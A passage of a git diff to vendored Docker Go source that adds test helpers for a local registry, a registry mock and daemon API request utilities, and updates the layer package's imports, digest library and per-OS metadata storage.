+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	c := &Config{
+		registryURL: DefaultURL,
+	}
+	for _, op := range ops {
+		op(c)
+	}
+	tmp, err := ioutil.TempDir("", "registry-test-")
+	assert.NilError(t, err)
+	template := `version: 0.1
+loglevel: debug
+storage:
+    filesystem:
+        rootdirectory: %s
+http:
+    addr: %s
+%s`
+	var (
+		authTemplate string
+		username     string
+		password     string
+		email        string
+	)
+	switch c.auth {
+	case "htpasswd":
+		htpasswdPath := filepath.Join(tmp, "htpasswd")
+		// generated with: htpasswd -Bbn testuser testpassword
+		userpasswd := "testuser:$2y$05$sBsSqk0OpSD1uTZkHXc4FeJ0Z70wLQdAX/82UiHuQOKbNbBrzs63m"
+		username = "testuser"
+		password = "testpassword"
+		email = "test@test.org"
+		err := ioutil.WriteFile(htpasswdPath, []byte(userpasswd), os.FileMode(0644))
+		assert.NilError(t, err)
+		authTemplate = fmt.Sprintf(`auth:
+    htpasswd:
+        realm: basic-realm
+        path: %s
+`, htpasswdPath)
+	case "token":
+		authTemplate = fmt.Sprintf(`auth:
+    token:
+        realm: %s
+        service: "registry"
+        issuer: "auth-registry"
+        rootcertbundle: "fixtures/registry/cert.pem"
+`, c.tokenURL)
+	}
+
+	confPath := filepath.Join(tmp, "config.yaml")
+	config, err := os.Create(confPath)
+	assert.NilError(t, err)
+	defer config.Close()
+
+	if _, err := fmt.Fprintf(config, template, tmp, c.registryURL, authTemplate); err != nil {
+		// FIXME(vdemeester) use a defer/clean func
+		os.RemoveAll(tmp)
+		t.Fatal(err)
+	}
+
+	binary := V2binary
+	if c.schema1 {
+		binary = V2binarySchema1
+	}
+	cmd := exec.Command(binary, confPath)
+	if err := cmd.Start(); err != nil {
+		// FIXME(vdemeester) use a defer/clean func
+		os.RemoveAll(tmp)
+		t.Fatal(err)
+	}
+	return &V2{
+		cmd:         cmd,
+		dir:         tmp,
+		auth:        c.auth,
+		username:    username,
+		password:    password,
+		email:       email,
+		registryURL: c.registryURL,
+	}
+}
+
+// WaitReady waits for the registry to be ready to serve requests (or fail after a while)
+func (r *V2) WaitReady(t testingT) {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	var err error
+	for i := 0; i != 50; i++ {
+		if err = r.Ping(); err == nil {
+			return
+		}
+		time.Sleep(100 * time.Millisecond)
+	}
+	t.Fatalf("timeout waiting for test registry to become available: %v", err)
+}
+
+// Ping sends an http request to the current registry, and fail if it doesn't respond correctly
+func (r *V2) Ping() error {
+	// We always ping through HTTP for our test registry.
+	resp, err := http.Get(fmt.Sprintf("http://%s/v2/", r.registryURL))
+	if err != nil {
+		return err
+	}
+	resp.Body.Close()
+
+	fail := resp.StatusCode != http.StatusOK
+	if r.auth != "" {
+		// unauthorized is a _good_ status when pinging v2/ and it needs auth
+		fail = fail && resp.StatusCode != http.StatusUnauthorized
+	}
+	if fail {
+		return fmt.Errorf("registry ping replied with an unexpected status code %d", resp.StatusCode)
+	}
+	return nil
+}
+
+// Close kills the registry server
+func (r *V2) Close() {
+	r.cmd.Process.Kill()
+	r.cmd.Process.Wait()
+	os.RemoveAll(r.dir)
+}
+
+func (r *V2) getBlobFilename(blobDigest digest.Digest) string {
+	// Split the digest into its algorithm and hex components.
+	dgstAlg, dgstHex := blobDigest.Algorithm(), blobDigest.Hex()
+
+	// The path to the target blob data looks something like:
+	//   baseDir + "docker/registry/v2/blobs/sha256/a3/a3ed...46d4/data"
+	return fmt.Sprintf("%s/docker/registry/v2/blobs/%s/%s/%s/data", r.dir, dgstAlg, dgstHex[:2], dgstHex)
+}
+
+// ReadBlobContents read the file corresponding to the specified digest
+func (r *V2) ReadBlobContents(t assert.TestingT, blobDigest digest.Digest) []byte {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	// Load the target manifest blob.
+	manifestBlob, err := ioutil.ReadFile(r.getBlobFilename(blobDigest))
+	assert.NilError(t, err, "unable to read blob")
+	return manifestBlob
+}
+
+// WriteBlobContents write the file corresponding to the specified digest with the given content
+func (r *V2) WriteBlobContents(t assert.TestingT, blobDigest digest.Digest, data []byte) {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	err := ioutil.WriteFile(r.getBlobFilename(blobDigest), data, os.FileMode(0644))
+	assert.NilError(t, err, "unable to write malicious data blob")
+}
+
+// TempMoveBlobData moves the existing data file aside, so that we can replace it with a
+// malicious blob of data for example.
+func (r *V2) TempMoveBlobData(t testingT, blobDigest digest.Digest) (undo func()) {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	tempFile, err := ioutil.TempFile("", "registry-temp-blob-")
+	assert.NilError(t, err, "unable to get temporary blob file")
+	tempFile.Close()
+
+	blobFilename := r.getBlobFilename(blobDigest)
+
+	// Move the existing data file aside, so that we can replace it with a
+	// another blob of data.
+	if err := os.Rename(blobFilename, tempFile.Name()); err != nil {
+		// FIXME(vdemeester) use a defer/clean func
+		os.Remove(tempFile.Name())
+		t.Fatalf("unable to move data blob: %s", err)
+	}
+
+	return func() {
+		os.Rename(tempFile.Name(), blobFilename)
+		os.Remove(tempFile.Name())
+	}
+}
+
+// Username returns the configured user name of the server
+func (r *V2) Username() string {
+	return r.username
+}
+
+// Password returns the configured password of the server
+func (r *V2) Password() string {
+	return r.password
+}
+
+// Email returns the configured email of the server
+func (r *V2) Email() string {
+	return r.email
+}
+
+// Path returns the path where the registry write data
+func (r *V2) Path() string {
+	return filepath.Join(r.dir, "docker", "registry", "v2")
+}
diff --git a/vendor/github.com/docker/docker/internal/test/registry/registry_mock.go b/vendor/github.com/docker/docker/internal/test/registry/registry_mock.go
new file mode 100644
index 0000000000..d139401a62
--- /dev/null
+++ b/vendor/github.com/docker/docker/internal/test/registry/registry_mock.go
@@ -0,0 +1,71 @@
+package registry // import "github.com/docker/docker/internal/test/registry"
+
+import (
+	"net/http"
+	"net/http/httptest"
+	"regexp"
+	"strings"
+	"sync"
+
+	"github.com/docker/docker/internal/test"
+)
+
+type handlerFunc func(w http.ResponseWriter, r *http.Request)
+
+// Mock represent a registry mock
+type Mock struct {
+	server   *httptest.Server
+	hostport string
+	handlers map[string]handlerFunc
+	mu       sync.Mutex
+}
+
+// RegisterHandler register the specified handler for the registry mock
+func (tr *Mock) RegisterHandler(path string, h handlerFunc) {
+	tr.mu.Lock()
+	defer tr.mu.Unlock()
+	tr.handlers[path] = h
+}
+
+// NewMock creates a registry mock
+func NewMock(t testingT) (*Mock, error) {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	testReg := &Mock{handlers: make(map[string]handlerFunc)}
+
+	ts := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		url := r.URL.String()
+
+		var matched bool
+		var err error
+		for re, function := range testReg.handlers {
+			matched, err = regexp.MatchString(re, url)
+			if err != nil {
+				t.Fatal("Error with handler regexp")
+			}
+			if matched {
+				function(w, r)
+				break
+			}
+		}
+
+		if !matched {
+			t.Fatalf("Unable to match %s with regexp", url)
+		}
+	}))
+
+	testReg.server = ts
+	testReg.hostport = strings.Replace(ts.URL, "http://", "", 1)
+	return testReg, nil
+}
+
+// URL returns the url of the registry
+func (tr *Mock) URL() string {
+	return tr.hostport
+}
+
+// Close closes mock and releases resources
+func (tr *Mock) Close() {
+	tr.server.Close()
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/npipe.go b/vendor/github.com/docker/docker/internal/test/request/npipe.go
similarity index 91%
rename from vendor/github.com/docker/docker/integration-cli/npipe.go
rename to vendor/github.com/docker/docker/internal/test/request/npipe.go
index fa531a1b4d..e6ab03945e 100644
--- a/vendor/github.com/docker/docker/integration-cli/npipe.go
+++ b/vendor/github.com/docker/docker/internal/test/request/npipe.go
@@ -1,6 +1,6 @@
 // +build !windows
 
-package main
+package request
 
 import (
 	"net"
diff --git a/vendor/github.com/docker/docker/integration-cli/npipe_windows.go b/vendor/github.com/docker/docker/internal/test/request/npipe_windows.go
similarity index 91%
rename from vendor/github.com/docker/docker/integration-cli/npipe_windows.go
rename to vendor/github.com/docker/docker/internal/test/request/npipe_windows.go
index 4fd735f2db..a268aac922 100644
--- a/vendor/github.com/docker/docker/integration-cli/npipe_windows.go
+++ b/vendor/github.com/docker/docker/internal/test/request/npipe_windows.go
@@ -1,4 +1,4 @@
-package main
+package request
 
 import (
 	"net"
diff --git a/vendor/github.com/docker/docker/internal/test/request/ops.go b/vendor/github.com/docker/docker/internal/test/request/ops.go
new file mode 100644
index 0000000000..c85308c476
--- /dev/null
+++ b/vendor/github.com/docker/docker/internal/test/request/ops.go
@@ -0,0 +1,78 @@
+package request
+
+import (
+	"bytes"
+	"encoding/json"
+	"io"
+	"io/ioutil"
+	"net/http"
+	"strings"
+)
+
+// Options defines request options, like request modifiers and which host to target
+type Options struct {
+	host             string
+	requestModifiers []func(*http.Request) error
+}
+
+// Host creates a modifier that sets the specified host as the request URL host
+func Host(host string) func(*Options) {
+	return func(o *Options) {
+		o.host = host
+	}
+}
+
+// With adds a request modifier to the options
+func With(f func(*http.Request) error) func(*Options) {
+	return func(o *Options) {
+		o.requestModifiers = append(o.requestModifiers, f)
+	}
+}
+
+// Method creates a modifier that sets the specified string as the request method
+func Method(method string) func(*Options) {
+	return With(func(req *http.Request) error {
+		req.Method = method
+		return nil
+	})
+}
+
+// RawString sets the specified string as body for the request
+func RawString(content string) func(*Options) {
+	return RawContent(ioutil.NopCloser(strings.NewReader(content)))
+}
+
+// RawContent sets the specified reader as body for the request
+func RawContent(reader io.ReadCloser) func(*Options) {
+	return With(func(req *http.Request) error {
+		req.Body = reader
+		return nil
+	})
+}
+
+// ContentType sets the specified Content-Type request header
+func ContentType(contentType string) func(*Options) {
+	return With(func(req *http.Request) error {
+		req.Header.Set("Content-Type", contentType)
+		return nil
+	})
+}
+
+// JSON sets the Content-Type request header to json
+func JSON(o *Options) {
+	ContentType("application/json")(o)
+}
+
+// JSONBody creates a modifier that encodes the specified data to a JSON string and set it as request body. It also sets
+// the Content-Type header of the request.
+func JSONBody(data interface{}) func(*Options) {
+	return With(func(req *http.Request) error {
+		jsonData := bytes.NewBuffer(nil)
+		if err := json.NewEncoder(jsonData).Encode(data); err != nil {
+			return err
+		}
+		req.Body = ioutil.NopCloser(jsonData)
+		req.Header.Set("Content-Type", "application/json")
+		return nil
+	})
+}
diff --git a/vendor/github.com/docker/docker/internal/test/request/request.go b/vendor/github.com/docker/docker/internal/test/request/request.go
new file mode 100644
index 0000000000..1986d370f1
--- /dev/null
+++ b/vendor/github.com/docker/docker/internal/test/request/request.go
@@ -0,0 +1,218 @@
+package request // import "github.com/docker/docker/internal/test/request"
+
+import (
+	"context"
+	"crypto/tls"
+	"fmt"
+	"io"
+	"io/ioutil"
+	"net"
+	"net/http"
+	"net/url"
+	"os"
+	"path/filepath"
+	"time"
+
+	"github.com/docker/docker/client"
+	"github.com/docker/docker/internal/test"
+	"github.com/docker/docker/internal/test/environment"
+	"github.com/docker/docker/opts"
+	"github.com/docker/docker/pkg/ioutils"
+	"github.com/docker/go-connections/sockets"
+	"github.com/docker/go-connections/tlsconfig"
+	"github.com/pkg/errors"
+	"gotest.tools/assert"
+)
+
+// NewAPIClient returns a docker API client configured from environment variables
+func NewAPIClient(t assert.TestingT, ops ...func(*client.Client) error) client.APIClient {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	ops = append([]func(*client.Client) error{client.FromEnv}, ops...)
+	clt, err := client.NewClientWithOpts(ops...)
+	assert.NilError(t, err)
+	return clt
+}
+
+// DaemonTime provides the current time on the daemon host
+func DaemonTime(ctx context.Context, t assert.TestingT, client client.APIClient, testEnv *environment.Execution) time.Time {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	if testEnv.IsLocalDaemon() {
+		return time.Now()
+	}
+
+	info, err := client.Info(ctx)
+	assert.NilError(t, err)
+
+	dt, err := time.Parse(time.RFC3339Nano, info.SystemTime)
+	assert.NilError(t, err, "invalid time format in GET /info response")
+	return dt
+}
+
+// DaemonUnixTime returns the current time on the daemon host with nanoseconds precision.
+// It return the time formatted how the client sends timestamps to the server.
+func DaemonUnixTime(ctx context.Context, t assert.TestingT, client client.APIClient, testEnv *environment.Execution) string {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	dt := DaemonTime(ctx, t, client, testEnv)
+	return fmt.Sprintf("%d.%09d", dt.Unix(), int64(dt.Nanosecond()))
+}
+
+// Post creates and execute a POST request on the specified host and endpoint, with the specified request modifiers
+func Post(endpoint string, modifiers ...func(*Options)) (*http.Response, io.ReadCloser, error) {
+	return Do(endpoint, append(modifiers, Method(http.MethodPost))...)
+}
+
+// Delete creates and execute a DELETE request on the specified host and endpoint, with the specified request modifiers
+func Delete(endpoint string, modifiers ...func(*Options)) (*http.Response, io.ReadCloser, error) {
+	return Do(endpoint, append(modifiers, Method(http.MethodDelete))...)
+}
+
+// Get creates and execute a GET request on the specified host and endpoint, with the specified request modifiers
+func Get(endpoint string, modifiers ...func(*Options)) (*http.Response, io.ReadCloser, error) {
+	return Do(endpoint, modifiers...)
+}
+
+// Do creates and execute a request on the specified endpoint, with the specified request modifiers
+func Do(endpoint string, modifiers ...func(*Options)) (*http.Response, io.ReadCloser, error) {
+	opts := &Options{
+		host: DaemonHost(),
+	}
+	for _, mod := range modifiers {
+		mod(opts)
+	}
+	req, err := newRequest(endpoint, opts)
+	if err != nil {
+		return nil, nil, err
+	}
+	client, err := newHTTPClient(opts.host)
+	if err != nil {
+		return nil, nil, err
+	}
+	resp, err := client.Do(req)
+	var body io.ReadCloser
+	if resp != nil {
+		body = ioutils.NewReadCloserWrapper(resp.Body, func() error {
+			defer resp.Body.Close()
+			return nil
+		})
+	}
+	return resp, body, err
+}
+
+// ReadBody read the specified ReadCloser content and returns it
+func ReadBody(b io.ReadCloser) ([]byte, error) {
+	defer b.Close()
+	return ioutil.ReadAll(b)
+}
+
+// newRequest creates a new http Request to the specified host and endpoint, with the specified request modifiers
+func newRequest(endpoint string, opts *Options) (*http.Request, error) {
+	hostURL, err := client.ParseHostURL(opts.host)
+	if err != nil {
+		return nil, errors.Wrapf(err, "failed parsing url %q", opts.host)
+	}
+	req, err := http.NewRequest("GET", endpoint, nil)
+	if err != nil {
+		return nil, errors.Wrap(err, "failed to create request")
+	}
+
+	if os.Getenv("DOCKER_TLS_VERIFY") != "" {
+		req.URL.Scheme = "https"
+	} else {
+		req.URL.Scheme = "http"
+	}
+	req.URL.Host = hostURL.Host
+
+	for _, config := range opts.requestModifiers {
+		if err := config(req); err != nil {
+			return nil, err
+		}
+	}
+
+	return req, nil
+}
+
+// newHTTPClient creates an http client for the specific host
+// TODO: Share more code with client.defaultHTTPClient
+func newHTTPClient(host string) (*http.Client, error) {
+	// FIXME(vdemeester) 10*time.Second timeout of SockRequest… ?
+	hostURL, err := client.ParseHostURL(host)
+	if err != nil {
+		return nil, err
+	}
+	transport := new(http.Transport)
+	if hostURL.Scheme == "tcp" && os.Getenv("DOCKER_TLS_VERIFY") != "" {
+		// Setup the socket TLS configuration.
+		tlsConfig, err := getTLSConfig()
+		if err != nil {
+			return nil, err
+		}
+		transport = &http.Transport{TLSClientConfig: tlsConfig}
+	}
+	transport.DisableKeepAlives = true
+	err = sockets.ConfigureTransport(transport, hostURL.Scheme, hostURL.Host)
+	return &http.Client{Transport: transport}, err
+}
+
+func getTLSConfig() (*tls.Config, error) {
+	dockerCertPath := os.Getenv("DOCKER_CERT_PATH")
+
+	if dockerCertPath == "" {
+		return nil, errors.New("DOCKER_TLS_VERIFY specified, but no DOCKER_CERT_PATH environment variable")
+	}
+
+	option := &tlsconfig.Options{
+		CAFile:   filepath.Join(dockerCertPath, "ca.pem"),
+		CertFile: filepath.Join(dockerCertPath, "cert.pem"),
+		KeyFile:  filepath.Join(dockerCertPath, "key.pem"),
+	}
+	tlsConfig, err := tlsconfig.Client(*option)
+	if err != nil {
+		return nil, err
+	}
+
+	return tlsConfig, nil
+}
+
+// DaemonHost return the daemon host string for this test execution
+func DaemonHost() string {
+	daemonURLStr := "unix://" + opts.DefaultUnixSocket
+	if daemonHostVar := os.Getenv("DOCKER_HOST"); daemonHostVar != "" {
+		daemonURLStr = daemonHostVar
+	}
+	return daemonURLStr
+}
+
+// SockConn opens a connection on the specified socket
+func SockConn(timeout time.Duration, daemon string) (net.Conn, error) {
+	daemonURL, err := url.Parse(daemon)
+	if err != nil {
+		return nil, errors.Wrapf(err, "could not parse url %q", daemon)
+	}
+
+	var c net.Conn
+	switch daemonURL.Scheme {
+	case "npipe":
+		return npipeDial(daemonURL.Path, timeout)
+	case "unix":
+		return net.DialTimeout(daemonURL.Scheme, daemonURL.Path, timeout)
+	case "tcp":
+		if os.Getenv("DOCKER_TLS_VERIFY") != "" {
+			// Setup the socket TLS configuration.
+			tlsConfig, err := getTLSConfig()
+			if err != nil {
+				return nil, err
+			}
+			dialer := &net.Dialer{Timeout: timeout}
+			return tls.DialWithDialer(dialer, daemonURL.Scheme, daemonURL.Host, tlsConfig)
+		}
+		return net.DialTimeout(daemonURL.Scheme, daemonURL.Host, timeout)
+	default:
+		return c, errors.Errorf("unknown scheme %v (%s)", daemonURL.Scheme, daemon)
+	}
+}
diff --git a/vendor/github.com/docker/docker/internal/testutil/helpers.go b/vendor/github.com/docker/docker/internal/testutil/helpers.go
new file mode 100644
index 0000000000..38cd1693f5
--- /dev/null
+++ b/vendor/github.com/docker/docker/internal/testutil/helpers.go
@@ -0,0 +1,17 @@
+package testutil // import "github.com/docker/docker/internal/testutil"
+
+import (
+	"io"
+)
+
+// DevZero acts like /dev/zero but in an OS-independent fashion.
+var DevZero io.Reader = devZero{}
+
+type devZero struct{}
+
+func (d devZero) Read(p []byte) (n int, err error) {
+	for i := range p {
+		p[i] = 0
+	}
+	return len(p), nil
+}
diff --git a/vendor/github.com/docker/docker/internal/testutil/stringutils.go b/vendor/github.com/docker/docker/internal/testutil/stringutils.go
new file mode 100644
index 0000000000..574aeb51f2
--- /dev/null
+++ b/vendor/github.com/docker/docker/internal/testutil/stringutils.go
@@ -0,0 +1,14 @@
+package testutil // import "github.com/docker/docker/internal/testutil"
+
+import "math/rand"
+
+// GenerateRandomAlphaOnlyString generates an alphabetical random string with length n.
+func GenerateRandomAlphaOnlyString(n int) string {
+	// make a really long string
+	letters := []byte("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ")
+	b := make([]byte, n)
+	for i := range b {
+		b[i] = letters[rand.Intn(len(letters))]
+	}
+	return string(b)
+}
diff --git a/vendor/github.com/docker/docker/internal/testutil/stringutils_test.go b/vendor/github.com/docker/docker/internal/testutil/stringutils_test.go
new file mode 100644
index 0000000000..753aac966d
--- /dev/null
+++ b/vendor/github.com/docker/docker/internal/testutil/stringutils_test.go
@@ -0,0 +1,34 @@
+package testutil // import "github.com/docker/docker/internal/testutil"
+
+import (
+	"testing"
+
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+)
+
+func testLengthHelper(generator func(int) string, t *testing.T) {
+	expectedLength := 20
+	s := generator(expectedLength)
+	assert.Check(t, is.Equal(expectedLength, len(s)))
+}
+
+func testUniquenessHelper(generator func(int) string, t *testing.T) {
+	repeats := 25
+	set := make(map[string]struct{}, repeats)
+	for i := 0; i < repeats; i = i + 1 {
+		str := generator(64)
+		assert.Check(t, is.Equal(64, len(str)))
+		_, ok := set[str]
+		assert.Check(t, !ok, "Random number is repeated")
+		set[str] = struct{}{}
+	}
+}
+
+func TestGenerateRandomAlphaOnlyStringLength(t *testing.T) {
+	testLengthHelper(GenerateRandomAlphaOnlyString, t)
+}
+
+func TestGenerateRandomAlphaOnlyStringUniqueness(t *testing.T) {
+	testUniquenessHelper(GenerateRandomAlphaOnlyString, t)
+}
diff --git a/vendor/github.com/docker/docker/layer/empty.go b/vendor/github.com/docker/docker/layer/empty.go
index 3b6ffc82f7..c81c702140 100644
--- a/vendor/github.com/docker/docker/layer/empty.go
+++ b/vendor/github.com/docker/docker/layer/empty.go
@@ -1,4 +1,4 @@
-package layer
+package layer // import "github.com/docker/docker/layer"
 
 import (
 	"archive/tar"
@@ -54,3 +54,8 @@ func (el *emptyLayer) DiffSize() (size int64, err error) {
 func (el *emptyLayer) Metadata() (map[string]string, error) {
 	return make(map[string]string), nil
 }
+
+// IsEmpty returns true if the layer is an EmptyLayer
+func IsEmpty(diffID DiffID) bool {
+	return diffID == DigestSHA256EmptyTar
+}
diff --git a/vendor/github.com/docker/docker/layer/empty_test.go b/vendor/github.com/docker/docker/layer/empty_test.go
index c22da7665d..ec9fbc1a3c 100644
--- a/vendor/github.com/docker/docker/layer/empty_test.go
+++ b/vendor/github.com/docker/docker/layer/empty_test.go
@@ -1,15 +1,15 @@
-package layer
+package layer // import "github.com/docker/docker/layer"
 
 import (
 	"io"
 	"testing"
 
-	"github.com/docker/distribution/digest"
+	"github.com/opencontainers/go-digest"
 )
 
 func TestEmptyLayer(t *testing.T) {
 	if EmptyLayer.ChainID() != ChainID(DigestSHA256EmptyTar) {
-		t.Fatal("wrong ID for empty layer")
+		t.Fatal("wrong ChainID for empty layer")
 	}
 
 	if EmptyLayer.DiffID() != DigestSHA256EmptyTar {
@@ -28,12 +28,18 @@ func TestEmptyLayer(t *testing.T) {
 		t.Fatal("expected zero diffsize for empty layer")
 	}
 
+	meta, err := EmptyLayer.Metadata()
+
+	if len(meta) != 0 || err != nil {
+		t.Fatal("expected zero length metadata for empty layer")
+	}
+
 	tarStream, err := EmptyLayer.TarStream()
 	if err != nil {
 		t.Fatalf("error streaming tar for empty layer: %v", err)
 	}
 
-	digester := digest.Canonical.New()
+	digester := digest.Canonical.Digester()
 	_, err = io.Copy(digester.Hash(), tarStream)
 
 	if err != nil {
diff --git a/vendor/github.com/docker/docker/layer/filestore.go b/vendor/github.com/docker/docker/layer/filestore.go
index 42b45556e3..208a0c3a85 100644
--- a/vendor/github.com/docker/docker/layer/filestore.go
+++ b/vendor/github.com/docker/docker/layer/filestore.go
@@ -1,9 +1,8 @@
-package layer
+package layer // import "github.com/docker/docker/layer"
 
 import (
 	"compress/gzip"
 	"encoding/json"
-	"errors"
 	"fmt"
 	"io"
 	"io/ioutil"
@@ -13,10 +12,11 @@ import (
 	"strconv"
 	"strings"
 
-	"github.com/Sirupsen/logrus"
 	"github.com/docker/distribution"
-	"github.com/docker/distribution/digest"
 	"github.com/docker/docker/pkg/ioutils"
+	"github.com/opencontainers/go-digest"
+	"github.com/pkg/errors"
+	"github.com/sirupsen/logrus"
 )
 
 var (
@@ -37,10 +37,10 @@ type fileMetadataTransaction struct {
 	ws    *ioutils.AtomicWriteSet
 }
 
-// NewFSMetadataStore returns an instance of a metadata store
+// newFSMetadataStore returns an instance of a metadata store
 // which is backed by files on disk using the provided root
 // as the root of metadata files.
-func NewFSMetadataStore(root string) (MetadataStore, error) {
+func newFSMetadataStore(root string) (*fileMetadataStore, error) {
 	if err := os.MkdirAll(root, 0700); err != nil {
 		return nil, err
 	}
@@ -66,7 +66,7 @@ func (fms *fileMetadataStore) getMountFilename(mount, filename string) string {
 	return filepath.Join(fms.getMountDirectory(mount), filename)
 }
 
-func (fms *fileMetadataStore) StartTransaction() (MetadataTransaction, error) {
+func (fms *fileMetadataStore) StartTransaction() (*fileMetadataTransaction, error) {
 	tmpDir := filepath.Join(fms.root, "tmp")
 	if err := os.MkdirAll(tmpDir, 0755); err != nil {
 		return nil, err
@@ -165,7 +165,7 @@ func (fms *fileMetadataStore) GetParent(layer ChainID) (ChainID, error) {
 		return "", err
 	}
 
-	dgst, err := digest.ParseDigest(strings.TrimSpace(string(content)))
+	dgst, err := digest.Parse(strings.TrimSpace(string(content)))
 	if err != nil {
 		return "", err
 	}
@@ -179,7 +179,7 @@ func (fms *fileMetadataStore) GetDiffID(layer ChainID) (DiffID, error) {
 		return "", err
 	}
 
-	dgst, err := digest.ParseDigest(strings.TrimSpace(string(content)))
+	dgst, err := digest.Parse(strings.TrimSpace(string(content)))
 	if err != nil {
 		return "", err
 	}
@@ -194,8 +194,8 @@ func (fms *fileMetadataStore) GetCacheID(layer ChainID) (string, error) {
 	}
 	content := strings.TrimSpace(string(contentBytes))
 
-	if !stringIDRegexp.MatchString(content) {
-		return "", errors.New("invalid cache id value")
+	if content == "" {
+		return "", errors.Errorf("invalid cache id value")
 	}
 
 	return content, nil
@@ -226,6 +226,7 @@ func (fms *fileMetadataStore) TarSplitReader(layer ChainID) (io.ReadCloser, erro
 	}
 	f, err := gzip.NewReader(fz)
 	if err != nil {
+		fz.Close()
 		return nil, err
 	}
 
@@ -296,7 +297,7 @@ func (fms *fileMetadataStore) GetMountParent(mount string) (ChainID, error) {
 		return "", err
 	}
 
-	dgst, err := digest.ParseDigest(strings.TrimSpace(string(content)))
+	dgst, err := digest.Parse(strings.TrimSpace(string(content)))
 	if err != nil {
 		return "", err
 	}
diff --git a/vendor/github.com/docker/docker/layer/filestore_test.go b/vendor/github.com/docker/docker/layer/filestore_test.go
index 55e3b28530..498379e37f 100644
--- a/vendor/github.com/docker/docker/layer/filestore_test.go
+++ b/vendor/github.com/docker/docker/layer/filestore_test.go
@@ -1,4 +1,4 @@
-package layer
+package layer // import "github.com/docker/docker/layer"
 
 import (
 	"fmt"
@@ -10,7 +10,7 @@ import (
 	"syscall"
 	"testing"
 
-	"github.com/docker/distribution/digest"
+	"github.com/opencontainers/go-digest"
 )
 
 func randomLayerID(seed int64) ChainID {
@@ -24,12 +24,12 @@ func newFileMetadataStore(t *testing.T) (*fileMetadataStore, string, func()) {
 	if err != nil {
 		t.Fatal(err)
 	}
-	fms, err := NewFSMetadataStore(td)
+	fms, err := newFSMetadataStore(td)
 	if err != nil {
 		t.Fatal(err)
 	}
 
-	return fms.(*fileMetadataStore), td, func() {
+	return fms, td, func() {
 		if err := os.RemoveAll(td); err != nil {
 			t.Logf("Failed to cleanup %q: %s", td, err)
 		}
diff --git a/vendor/github.com/docker/docker/layer/filestore_unix.go b/vendor/github.com/docker/docker/layer/filestore_unix.go
new file mode 100644
index 0000000000..68e7f90779
--- /dev/null
+++ b/vendor/github.com/docker/docker/layer/filestore_unix.go
@@ -0,0 +1,15 @@
+// +build !windows
+
+package layer // import "github.com/docker/docker/layer"
+
+import "runtime"
+
+// setOS writes the "os" file to the layer filestore
+func (fm *fileMetadataTransaction) setOS(os string) error {
+	return nil
+}
+
+// getOS reads the "os" file from the layer filestore
+func (fms *fileMetadataStore) getOS(layer ChainID) (string, error) {
+	return runtime.GOOS, nil
+}
diff --git a/vendor/github.com/docker/docker/layer/filestore_windows.go b/vendor/github.com/docker/docker/layer/filestore_windows.go
new file mode 100644
index 0000000000..cecad426c8
--- /dev/null
+++ b/vendor/github.com/docker/docker/layer/filestore_windows.go
@@ -0,0 +1,35 @@
+package layer // import "github.com/docker/docker/layer"
+
+import (
+	"fmt"
+	"io/ioutil"
+	"os"
+	"strings"
+)
+
+// setOS writes the "os" file to the layer filestore
+func (fm *fileMetadataTransaction) setOS(os string) error {
+	if os == "" {
+		return nil
+	}
+	return fm.ws.WriteFile("os", []byte(os), 0644)
+}
+
+// getOS reads the "os" file from the layer filestore
+func (fms *fileMetadataStore) getOS(layer ChainID) (string, error) {
+	contentBytes, err := ioutil.ReadFile(fms.getLayerFilename(layer, "os"))
+	if err != nil {
+		// For backwards compatibility, the os file may not exist. Default to "windows" if missing.
+		if os.IsNotExist(err) {
+			return "windows", nil
+		}
+		return "", err
+	}
+	content := strings.TrimSpace(string(contentBytes))
+
+	if content != "windows" && content != "linux" {
+		return "", fmt.Errorf("invalid operating system value: %s", content)
+	}
+
+	return content, nil
+}
diff --git a/vendor/github.com/docker/docker/layer/layer.go b/vendor/github.com/docker/docker/layer/layer.go
index ec1d4346d7..d0c7fa8608 100644
--- a/vendor/github.com/docker/docker/layer/layer.go
+++ b/vendor/github.com/docker/docker/layer/layer.go
@@ -7,16 +7,17 @@
 // read-only and writable layers. The exported
 // tar data for a read-only layer should match
 // the tar used to create the layer.
-package layer
+package layer // import "github.com/docker/docker/layer"
 
 import (
 	"errors"
 	"io"
 
-	"github.com/Sirupsen/logrus"
 	"github.com/docker/distribution"
-	"github.com/docker/distribution/digest"
 	"github.com/docker/docker/pkg/archive"
+	"github.com/docker/docker/pkg/containerfs"
+	"github.com/opencontainers/go-digest"
+	"github.com/sirupsen/logrus"
 )
 
 var (
@@ -52,8 +53,8 @@ var (
 	ErrMaxDepthExceeded = errors.New("max depth exceeded")
 
 	// ErrNotSupported is used when the action is not supported
-	// on the current platform
-	ErrNotSupported = errors.New("not support on this platform")
+	// on the current host operating system.
+	ErrNotSupported = errors.New("not support on this host operating system")
 )
 
 // ChainID is the content-addressable ID of a layer.
@@ -126,7 +127,7 @@ type RWLayer interface {
 
 	// Mount mounts the RWLayer and returns the filesystem path
 	// the to the writable layer.
-	Mount(mountLabel string) (string, error)
+	Mount(mountLabel string) (containerfs.ContainerFS, error)
 
 	// Unmount unmounts the RWLayer. This should be called
 	// for every mount. If there are multiple mount calls
@@ -167,7 +168,14 @@ type Metadata struct {
 // writable mount. Changes made here will
 // not be included in the Tar stream of the
 // RWLayer.
-type MountInit func(root string) error
+type MountInit func(root containerfs.ContainerFS) error
+
+// CreateRWLayerOpts contains optional arguments to be passed to CreateRWLayer
+type CreateRWLayerOpts struct {
+	MountLabel string
+	InitFunc   MountInit
+	StorageOpt map[string]string
+}
 
 // Store represents a backend for managing both
 // read-only and read-write layers.
@@ -177,7 +185,7 @@ type Store interface {
 	Map() map[ChainID]Layer
 	Release(Layer) ([]Metadata, error)
 
